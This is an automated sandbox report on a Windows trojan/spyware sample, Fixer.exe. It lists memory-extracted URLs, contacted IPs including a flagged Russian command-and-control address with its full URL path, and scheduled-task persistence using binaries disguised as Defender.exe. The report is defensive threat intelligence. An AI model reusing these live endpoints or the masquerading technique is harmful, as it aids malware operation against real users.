                                          http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#Fixer.exe, 00000000.00000002.52600457326.0000000002D30000.00000004.00000800.00020000.00000000.sdmp, Defender.exe.3.dr, FixerNerest.exe.0.drfalse
                                            		high
                                            http://tempuri.org/Fixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://tempuri.org/Entity/Id2ResponseFixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://tempuri.org/Entity/Id21ResponseFixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_WrapFixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLIDFixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://tempuri.org/Entity/Id6ResponseDFixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.52600457326.0000000002DE7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecretFixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/IssueFixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://schemas.xmlsoap.org/ws/2004/10/wsat/AbortedFixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Fixer.exe, 00000000.00000002.52603430679.0000000003E84000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.52603430679.0000000003BDF000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.52603430679.0000000003F00000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequenceFixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://tempuri.org/Entity/Id13ResponseDFixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.52600457326.0000000002DEB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://schemas.xmlsoap.org/ws/2004/10/wsat/faultFixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://schemas.xmlsoap.org/ws/2004/10/wsatFixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://tempuri.org/Entity/Id15ResponseFixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://tempuri.org/Entity/Id14VFixer.exe, 00000000.00000002.52600457326.0000000002D60000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameFixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmp, 6z9uno0baqvej0me.exe, 00000002.00000002.52841079355.0000000002A44000.00000004.00000800.00020000.00000000.sdmp, FixerNerest.exe, 00000003.00000002.52853936146.0000000002A96000.00000004.00000800.00020000.00000000.sdmp, xdwdSecurityHealthSystrays.exe, 0000000D.00000002.52866509335.0000000002BD4000.00000004.00000800.00020000.00000000.sdmp, xdwdSecurityHealthSystrays.exe, 00000013.00000002.52877664599.0000000002B55000.00000004.00000800.00020000.00000000.sdmp, Defender.exe, 00000014.00000002.53588979577.0000000002B39000.00000004.00000800.00020000.00000000.sdmp, xdwdSecurityHealthSystrays.exe, 00000015.00000002.52889295522.00000000029E9000.00000004.00000800.00020000.00000000.sdmp, Defender.exe, 00000016.00000002.52919814800.0000000002BF6000.00000004.00000800.00020000.00000000.sdmp, xdwdSecurityHealthSystrays.exe, 00000017.00000002.53431573615.0000000003129000.00000004.00000800.00020000.00000000.sdmp, Defender.exe, 00000018.00000002.53436833869.0000000002979000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/RenewFixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterFixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKeyFixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://api.ip.sb/ipFixer.exefalse
                                                                                        		high
                                                                                        http://tempuri.org/Entity/Id1ResponseDFixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/CancelFixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Fixer.exe, 00000000.00000002.52603430679.0000000003BDF000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.52603430679.0000000003F00000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://tempuri.org/Entity/Id24ResponseFixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://www.ecosia.org/newtab/Fixer.exe, 00000000.00000002.52603430679.0000000003E84000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequestedFixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnegoFixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://tempuri.org/Entity/Id21ResponseDFixer.exe, 00000000.00000002.52600457326.0000000003024000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://schemas.xmlsoap.org/ws/2004/08/addressingFixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://schemas.xmlsoap.org/ws/2005/02/trust/RST/IssueFixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://tempuri.org/Entity/Id10ResponseDFixer.exe, 00000000.00000002.52600457326.0000000003024000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponseFixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://tempuri.org/Entity/Id5ResponseFixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://gemini.google.com/app?q=Fixer.exe, 00000000.00000002.52603430679.0000000003E84000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dnsFixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://tempuri.org/Entity/Id15ResponseDFixer.exe, 00000000.00000002.52600457326.0000000002E87000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://tempuri.org/Entity/Id10ResponseFixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://schemas.xmlsoap.org/ws/2005/02/trust/RenewFixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://tempuri.org/Entity/Id8ResponseFixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://ocsp.sectigo.com0Fixer.exe, 00000000.00000002.52600457326.0000000002D30000.00000004.00000800.00020000.00000000.sdmp, Defender.exe.3.dr, FixerNerest.exe.0.drfalse
                                                                                                                                  		high
                                                                                                                                  http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionIDFixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCTFixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://schemas.xmlsoap.org/ws/2006/02/addressingidentityFixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKeyFixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#Fixer.exe, 00000000.00000002.52600457326.0000000002D30000.00000004.00000800.00020000.00000000.sdmp, Defender.exe.3.dr, FixerNerest.exe.0.drfalse
                                                                                                                                            		high
                                                                                                                                            http://schemas.xmlsoap.org/ws/2004/10/wsat/RollbackFixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCTFixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                http://tempuri.org/DFixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  http://schemas.xmlsoap.org/ws/2004/06/addressingexFixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://www.google.com/images/branding/product/ico/googleg_alldp.icoFixer.exe, 00000000.00000002.52603430679.0000000003E84000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      http://schemas.xmlsoap.org/ws/2004/04/security/trust/NonceFixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponseFixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            http://tempuri.org/Entity/Id13ResponseFixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdFixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentifFixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  http://tempuri.org/Entity/Id12ResponseDFixer.exe, 00000000.00000002.52600457326.0000000003024000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    http://schemas.xmlsoap.org/ws/2004/10/wsat/CommittedFixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/right/possesspropertyFixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            http://schemas.xmlsoap.org/ws/2004/04/security/sc/sctFixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              http://tempuri.org/Entity/Id7ResponseDFixer.exe, 00000000.00000002.52600457326.0000000002E87000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgementFixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCTFixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    https://www.google.com/images/branding/product/ico/googleg_lodp.icoFixer.exe, 00000000.00000002.52603430679.0000000003E84000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.52603430679.0000000003BDF000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.52603430679.0000000003F00000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymousFixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        http://tempuri.org/Entity/Id4ResponseDFixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_WrapFixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            http://schemas.xmlsoap.org/ws/2002/12/policyFixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              http://tempuri.org/Entity/Id22ResponseFixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                http://tempuri.org/Entity/Id22ResponseDFixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  http://tempuri.org/Entity/Id16ResponseDFixer.exe, 00000000.00000002.52600457326.0000000002E87000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/IssueFixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextFixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        http://schemas.xmlsoap.org/ws/2005/02/trust/IssueFixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          http://tempuri.org/Entity/Id19ResponseDFixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.52600457326.0000000002D60000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            http://schemas.xmlsoap.org/ws/2005/02/trust/spnegoFixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              		high
                                                                                                                                                                                                              http://schemas.xmlsoap.org/ws/2005/02/scFixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                		high
                                                                                                                                                                                                                http://tempuri.org/Entity/Id18ResponseFixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                  http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsdFixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                    http://tempuri.org/Entity/Id3ResponseFixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      		high
                                                                                                                                                                                                                      http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceFixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        		high
                                                                                                                                                                                                                        http://schemas.xmlsoap.org/soap/actor/nextFixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          		high
                                                                                                                                                                                                                          http://tempuri.org/Entity/Id14ResponseDFixer.exe, 00000000.00000002.52600457326.0000000003024000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            		high

                                                                                                                                                                                                                            World Map of Contacted IPs

                                                                                                                                                                                                                            • No. of IPs < 25%
                                                                                                                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                                                                                                                            • 75% < No. of IPs

                                                                                                                                                                                                                            Public IPs

                                                                                                                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                            89.23.97.121
                                                                                                                                                                                                                            		unknownRussian Federation
                                                                                                                                                                                                                            		48687MAXITEL-ASRUtrue
                                                                                                                                                                                                                            147.185.221.24
                                                                                                                                                                                                                            		et-seattle.gl.at.ply.ggUnited States
                                                                                                                                                                                                                            		12087SALSGIVERUSfalse

                                                                                                                                                                                                                            General Information

                                                                                                                                                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                            Analysis ID:1585853
                                                                                                                                                                                                                            Start date and time:2025-01-08 11:22:09 +01:00
                                                                                                                                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                            Overall analysis duration:0h 10m 36s
                                                                                                                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                            Report type:full
                                                                                                                                                                                                                            Cookbook file name:default.jbs
                                                                                                                                                                                                                            Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                                                                                                                                                                                            Run name:Suspected VM Detection
                                                                                                                                                                                                                            Number of analysed new started processes analysed:25
                                                                                                                                                                                                                            Number of new started drivers analysed:0
                                                                                                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                                                                                                            Number of injected processes analysed:0
                                                                                                                                                                                                                            Technologies:
                                                                                                                                                                                                                            • HCA enabled
                                                                                                                                                                                                                            • EGA enabled
                                                                                                                                                                                                                            • AMSI enabled
                                                                                                                                                                                                                            Analysis Mode:default
                                                                                                                                                                                                                            Analysis stop reason:Timeout
                                                                                                                                                                                                                            Sample name:Fixer.exe
                                                                                                                                                                                                                            Detection:MAL
                                                                                                                                                                                                                            Classification:mal100.troj.spyw.evad.winEXE@36/7@1/2
                                                                                                                                                                                                                            EGA Information:
                                                                                                                                                                                                                            • Successful, ratio: 100%
                                                                                                                                                                                                                            HCA Information:
                                                                                                                                                                                                                            • Successful, ratio: 97%
                                                                                                                                                                                                                            • Number of executed functions: 28
                                                                                                                                                                                                                            • Number of non-executed functions: 8
                                                                                                                                                                                                                            Cookbook Comments:
                                                                                                                                                                                                                            • Found application associated with file extension: .exe

                                                                                                                                                                                                                            Warnings

                                                                                                                                                                                                                            • Exclude process from analysis (whitelisted): dllhost.exe
                                                                                                                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtReadVirtualMemory calls found.

                                                                                                                                                                                                                            Simulations

                                                                                                                                                                                                                            Behavior and APIs

                                                                                                                                                                                                                            TimeTypeDescription
                                                                                                                                                                                                                            05:24:26API Interceptor85x Sleep call for process: Fixer.exe modified
                                                                                                                                                                                                                            11:25:05Task SchedulerRun new task: Schost path: C:\Windows\System32\xdwdSecurityHealthSystrays.exe
                                                                                                                                                                                                                            11:25:07Task SchedulerRun new task: SecurityHealthSystray12 path: C:\Windows\System32\xdwdSecurityHealthSystrays.exe
                                                                                                                                                                                                                            11:25:10Task SchedulerRun new task: WindowsAPI path: C:\Windows\System32\Defender.exe

                                                                                                                                                                                                                            Joe Sandbox View / Context

                                                                                                                                                                                                                            IPs

                                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                            89.23.97.121q3JT7kcpCR.exeGet hashmaliciousDCRatBrowse
                                                                                                                                                                                                                            • 89.23.97.121/Flowerprocessorjavascriptvideo/eternalbigload/test/4/Test/16Datalife8/HttpWpUploads/JsSqlSqlLine/UploadsCpuproton/Dbprotect/Local/Update/JsTemp/videolinepythonSql/flower/apiwordpressTest_/javascriptuniversal/ImageapiTemp.php
                                                                                                                                                                                                                            147.185.221.24spreadmalware.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                              7fqul5Zr8Y.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                loader.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                  loader.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    P3A946MOFP.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                      BootstrapperV1.16.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                        SharkHack.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                          avaydna.exeGet hashmaliciousNjratBrowse
                                                                                                                                                                                                                                            ddos tool.exeGet hashmaliciousXWormBrowse

                                                                                                                                                                                                                                              Domains

                                                                                                                                                                                                                                              No context

                                                                                                                                                                                                                                              ASNs

                                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                              MAXITEL-ASRUT4qO1i2Jav.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                              • 89.23.100.42
                                                                                                                                                                                                                                              XNPOazHpXF.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                                                              • 89.23.96.180
                                                                                                                                                                                                                                              9FwQYJSj4N.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                                                              • 89.23.96.180
                                                                                                                                                                                                                                              bPkG0wTVon.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                              • 89.23.100.233
                                                                                                                                                                                                                                              itLDZwgFNE.exeGet hashmaliciousFlesh StealerBrowse
                                                                                                                                                                                                                                              • 89.23.100.233
                                                                                                                                                                                                                                              3gJQoqWpxb.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                              • 89.23.100.233
                                                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, PureLog Stealer, StealcBrowse
                                                                                                                                                                                                                                              • 89.23.100.42
                                                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                              • 89.23.100.42
                                                                                                                                                                                                                                              7fE6IkvYWf.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                              • 89.23.100.233
                                                                                                                                                                                                                                              SALSGIVERUSspreadmalware.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                              • 147.185.221.24
                                                                                                                                                                                                                                              7fqul5Zr8Y.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                              • 147.185.221.24
                                                                                                                                                                                                                                              miori.arm.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                              • 147.168.252.34
                                                                                                                                                                                                                                              miori.m68k.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                              • 147.184.86.253
                                                                                                                                                                                                                                              loader.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                              • 147.185.221.24
                                                                                                                                                                                                                                              loader.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                              • 147.185.221.24
                                                                                                                                                                                                                                              My33xbeYIX.exeGet hashmaliciousNjratBrowse
                                                                                                                                                                                                                                              • 147.185.221.16
                                                                                                                                                                                                                                              YPzNsfg4nR.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                              • 147.185.221.21
                                                                                                                                                                                                                                              sela.exeGet hashmaliciousNjratBrowse
                                                                                                                                                                                                                                              • 147.185.221.17

                                                                                                                                                                                                                                              JA3 Fingerprints

                                                                                                                                                                                                                                              No context

                                                                                                                                                                                                                                              Dropped Files

                                                                                                                                                                                                                                              No context

                                                                                                                                                                                                                                              Created / dropped Files

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Defender.exe.log

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\Defender.exe
                                                                                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):642
                                                                                                                                                                                                                                              Entropy (8bit):5.343714716785993
                                                                                                                                                                                                                                              Encrypted:false
